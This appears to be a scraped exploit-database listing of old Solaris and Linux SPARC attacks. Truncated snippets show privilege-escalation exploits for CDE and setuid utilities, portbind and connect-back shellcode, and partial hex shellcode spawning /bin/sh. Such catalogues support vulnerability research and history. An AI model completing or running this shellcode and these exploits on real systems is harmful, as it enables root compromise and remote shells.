Solaris 7/8/9 (#SPARC) - (dtprintinfo) Local Privilege Escalation (1) Exploit

Exploit for solaris platform in category local exploits / raptordtprintnamesparc.c - dtprintinfo 0day, Solaris/SPARC Copyright c 2004-2019 Marco Ivaldi 0day buffer overflow in the dtprintinfo1 CDE Print Viewer, leading to local root. Many thanks to Dave Aitel for discovering this vulnerability an...

Solaris 8 libsldap Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/2931/info Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid. Libsldap contains a...

Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit

No description provided by source. / $Id: raptorlibdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ raptorlibdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9 Copyright c 2003-2004 Marco Ivaldi [email protected] Buffer overflow in CDE libDtHelp library allows local users to execute arbitrary...

Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits

No description provided by source. ---------------------------- file newpass.c ------------------------------- include stdio.h include syslog.h define hiddenpasswd "/bin/hpasswd" /change here .../ define MAXLENGTH 32 void mainint argc, char argv int i; char args10; ifargc 10 args0=hiddenpasswd;...

solaris/sparc portbind (port 6666) 240 bytes

Exploit for solaris/sparc platform in category shellcode ============================================ solaris/sparc portbind port 6666 240 bytes ============================================ / email protected portbind shellcode full description of how it was done and defines at...

solaris/SPARC portbind port 6789 228 bytes

Exploit for solaris/sparc platform in category shellcode ========================================== solaris/SPARC portbind port 6789 228 bytes ========================================== / Solaris shellcode - connects /bin/sh to a port Claes M. Nyberg 20020624 , / include / void mainvoid asm" !...

linux/SPARC - connect back 216 bytes

linux/SPARC connect back 216 bytes. Shellcode exploit for linuxsparc platform / linux sparc connect back shellcode, because someone had to evade those firewalls. sigh / / OS : Linux Architecture : Sparc Type : Connect Back Lenght : 216 Bytes Listen-Port : 2313/TCP Default IP : 192.168.100.1 see h...

linux/SPARC connect back 216 bytes

No description provided by source. / linux sparc connect back shellcode, because someone had to evade those firewalls. sigh / / OS : Linux Architecture : Sparc Type : Connect Back Lenght : 216 Bytes Listen-Port : 2313/TCP Default IP : 192.168.100.1 see how you'll change it at the end. null bytes...

solaris/SPARC execve /bin/sh 52 bytes

solaris/SPARC execve /bin/sh 52 bytes. Shellcode exploit for solarissparc platform //Solaris/Sparc - LSD char shellcode= "\x20\xbf\xff\xff" / bn,a / "\x20\xbf\xff\xff" / bn,a / "\x7f\xff\xff\xff" / call / "\x90\x03\xe0\x20" / add %o7,32,%o0 / "\x92\x02\x20\x10" / add %o0,16,%o1 / "\xc0\x22\x20\x0...

solaris/SPARC execve /bin/sh 52 bytes

No description provided by source. //Solaris/Sparc - LSD char shellcode= "\x20\xbf\xff\xff" / bn,a shellcode-4 / "\x20\xbf\xff\xff" / bn,a shellcode / "\x7f\xff\xff\xff" / call shellcode+4 / "\x90\x03\xe0\x20" / add %o7,32,%o0 / "\x92\x02\x20\x10" / add %o0,16,%o1 / "\xc0\x22\x20\x08" / st...

solaris/SPARC portbinding shellcode

Exploit for solaris/sparc platform in category shellcode =================================== solaris/SPARC portbinding shellcode =================================== / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0,...

Solaris 2.4 - binfdformat Local Buffer Overflow

Solaris 2.4 - binfdformat Local Buffer Overflow --------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode =...